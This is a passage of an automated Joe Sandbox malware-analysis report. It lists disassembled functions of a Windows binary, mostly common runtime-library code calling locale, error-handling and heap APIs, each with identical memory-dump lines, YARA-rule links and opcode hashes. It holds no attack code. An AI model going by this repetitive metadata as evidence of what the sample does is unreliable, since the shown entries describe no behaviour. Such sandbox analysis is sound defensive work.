                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                        • Instruction ID: 147a43d4a8953c0e587c79f7e81ca7cf09075d603a4ca368f499ea5921ccbf25
                                        • Opcode Fuzzy Hash: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                                        • Instruction Fuzzy Hash: DB026D71E002199FEF14CFA9C8806AEBBF1FF88314F25826AD919E7354D774A941CB84
                                        Function 004520E2 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004520DD,?,?,00000008,?,?,00455422,00000000), ref: 0045230F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionRaise
                                        • String ID:
                                        • API String ID: 3997070919-0
                                        • Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                        • Instruction ID: 977e517564c3c3d0049d1222f3e9a6889a5c410b4df8a0f985261284c0187219
                                        • Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                                        • Instruction Fuzzy Hash: D2B18E311106088FD715CF28C586B567BE0FF06325F25869AEC99CF2A2C379E986CB44
                                        Function 00432A59 Relevance: 1.8, Strings: 1, Instructions: 500COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 0
                                        • API String ID: 0-4108050209
                                        • Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                        • Instruction ID: 7b48c7cdb8adeeef677579d9f9868b7c31ff68b1fdc55a4cfb84755b90803176
                                        • Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                        • Instruction Fuzzy Hash: 7F02B3727083014BD714DF29D95272EF3E2BFCC718F19592EF4859B381DA78A9058B86
                                        Function 004510CA Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,00000000,?,0043B965,00000000,00000000), ref: 00446ED3
                                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F47
                                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F3B
                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045111E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$_free$InfoLocale_abort
                                        • String ID:
                                        • API String ID: 1663032902-0
                                        • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                        • Instruction ID: ffb89f5268d48ef7d96d62573a9e7ee2f0935f0833e1875b56c64ac51f5bdf94
                                        • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                        • Instruction Fuzzy Hash: BB21B332500606ABEB249E25DC42B7B73A8EF49316F1041BBFE01D6252EB7C9D49C759
                                        Function 00450D52 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,00000000,?,0043B965,00000000,00000000), ref: 00446ED3
                                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F47
                                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                        • EnumSystemLocalesW.KERNEL32(00450E7A,00000001,00000000,?,00443CFC,?,004514A7,00000000,?,?,?), ref: 00450DC4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                        • String ID:
                                        • API String ID: 1084509184-0
                                        • Opcode ID: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
                                        • Instruction ID: a560303710cbb7e2025c6fde9de160b8e713eede11b464f6c41b4ad7cf2026db
                                        • Opcode Fuzzy Hash: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
                                        • Instruction Fuzzy Hash: 0311063A2003055FDB189F79C8916BAB7A2FF8035AB14442DE94647741D375B846C744
                                        Function 004512FA Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,00000000,?,0043B965,00000000,00000000), ref: 00446ED3
                                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F47
                                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451098,00000000,00000000,?), ref: 00451326
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$InfoLocale_abort_free
                                        • String ID:
                                        • API String ID: 2692324296-0
                                        • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                        • Instruction ID: 4a7b2d8eee9e9bf1806ba2ca5426cfe5ee0bfa5d6ba01d855eb6d5500f899482
                                        • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                        • Instruction Fuzzy Hash: F8F07D32900211BBEF245B25CC16BFB7758EF40316F14046BEC05A3651EA78FD45C6D8
                                        Function 00450DED Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,00000000,?,0043B965,00000000,00000000), ref: 00446ED3
                                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F47
                                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                        • EnumSystemLocalesW.KERNEL32(004510CA,00000001,?,?,00443CFC,?,0045146B,00443CFC,?,?,?,?,?,00443CFC,?,?), ref: 00450E39
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                        • String ID:
                                        • API String ID: 1084509184-0
                                        • Opcode ID: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
                                        • Instruction ID: d200f6f198282f27697ffa375fc43d462b62b5ac62e6196a1a4f0d3fe89d4a8d
                                        • Opcode Fuzzy Hash: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
                                        • Instruction Fuzzy Hash: 6FF0223A2003055FDB145F3ADC92A7B7BD1EF81329B25883EFD458B681D2759C428604
                                        Function 004470BE Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00444ADC: EnterCriticalSection.KERNEL32(-00471558,?,0044226B,00000000,0046DAC0,0000000C,00442226,0000000A,?,?,00448749,0000000A,?,00446F84,00000001,00000364), ref: 00444AEB
                                        • EnumSystemLocalesW.KERNEL32(00447078,00000001,0046DC48,0000000C), ref: 004470F6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                        • String ID:
                                        • API String ID: 1272433827-0
                                        • Opcode ID: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                                        • Instruction ID: 950dafe7846e52006e44ffeb80a247b0be4aa16561b4e62d8165e672452c2196
                                        • Opcode Fuzzy Hash: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                                        • Instruction Fuzzy Hash: 86F04932A50200DFE714EF68EC06B5D37B0EB44729F10856AF414DB2A1CBB88941CB49
                                        Function 00450D07 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,00000000,?,0043B965,00000000,00000000), ref: 00446ED3
                                          • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                          • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F47
                                          • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                        • EnumSystemLocalesW.KERNEL32(00450C5E,00000001,?,?,?,004514C9,00443CFC,?,?,?,?,?,00443CFC,?,?,?), ref: 00450D3E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                        • String ID:
                                        • API String ID: 1084509184-0
                                        • Opcode ID: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                                        • Instruction ID: 864766c87332746f2956c71e591744750bfae77d4df159f99123e8476a767ca9
                                        • Opcode Fuzzy Hash: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                                        • Instruction Fuzzy Hash: 94F05C3D30020557CB159F75D8057667F90EFC2711B164059FE098B242C675D846C754
                                        Function 00433CE7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00033CF3,004339C1), ref: 00433CEC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                                        • Instruction ID: 7ebf6c7408a73aa63663f0c3c7f2b2a2f8c8f4297a3c6ea18d4629481275dad6
                                        • Opcode Fuzzy Hash: 551eff1786ed7eea90e54ff57207cf7fab7a3a56cebbc38fe8a2595e13bdd047
                                        • Instruction Fuzzy Hash:
                                        Function 0043CE4B Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: BG3i@
                                        • API String ID: 0-2407888476
                                        • Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                        • Instruction ID: 1d57165ebf75e2395586178747a5147ed71ba924114eacc5dbe4d8b8235841a2
                                        • Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                        • Instruction Fuzzy Hash: CF615771600605AADB386A2898D6BBF63A6EB4D718F10391BE543FB3C1D71DDD42831E
                                        Function 0043CC1C Relevance: 1.5, Strings: 1, Instructions: 214COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 0
                                        • API String ID: 0-4108050209
                                        • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                        • Instruction ID: b96fbfb60640764a27c773ebaff073e85ef5750e910638ac9767c22e4461be8a
                                        • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                        • Instruction Fuzzy Hash: 485168716006045BDB34466885DA7BF6B959B0E704F18352FE48AFB382C61EEE02975E
                                        Function 00426E83 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                        • Instruction ID: 2dad8dda13a96ac29719e0110185aa8107b7b917685da963ee6e6edef41cb95d
                                        • Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                        • Instruction Fuzzy Hash: C3416576A183158FC314CF29D18061BFBE1FBC8314F568A2EF99693350D679E980CB86
                                        Function 00437160 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: >G
                                        • API String ID: 0-1296849874
                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                        • Instruction ID: aab5066b8351c21b9abf1b6184216a89ccb323a2d5e30b0bcb97f0d730efd77d
                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                        • Instruction Fuzzy Hash: 08112BF724808243DE74863DC8B46B7A795EBCD321F2C637BD0C14BB58D32A99459908
                                        Function 0044E93E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        • API String ID: 54951025-0
                                        • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                        • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                        • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                        • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                        Function 0044C749 Relevance: .6, Instructions: 637COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                        • Instruction ID: ab2fb9cf530b2f7fc05e48a1b2542d0b548931935014995ce621e12a70c45bd8
                                        • Opcode Fuzzy Hash: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                        • Instruction Fuzzy Hash: D6324621D29F414DE7639634C862336A649AFB73C5F18D737E81AB5AAAEF2CC4C34105
                                        Function 0041E5EF Relevance: .6, Instructions: 606COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 56ea352148e3c774f87dcc4cf0de5d49bee8f4798448973f894b3d9cfc24b1ba
                                        • Instruction ID: 00ae404e09403cbabe28ca0a0a4d3aceb2ea5bd9e999d2a250848967357f0a7a
                                        • Opcode Fuzzy Hash: 56ea352148e3c774f87dcc4cf0de5d49bee8f4798448973f894b3d9cfc24b1ba
                                        • Instruction Fuzzy Hash: E532E3796083469BD714CF2AC4807ABB7E1BF84304F444A2EFC958B381D778DD858B8A
                                        Function 004267DB Relevance: .4, Instructions: 437COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
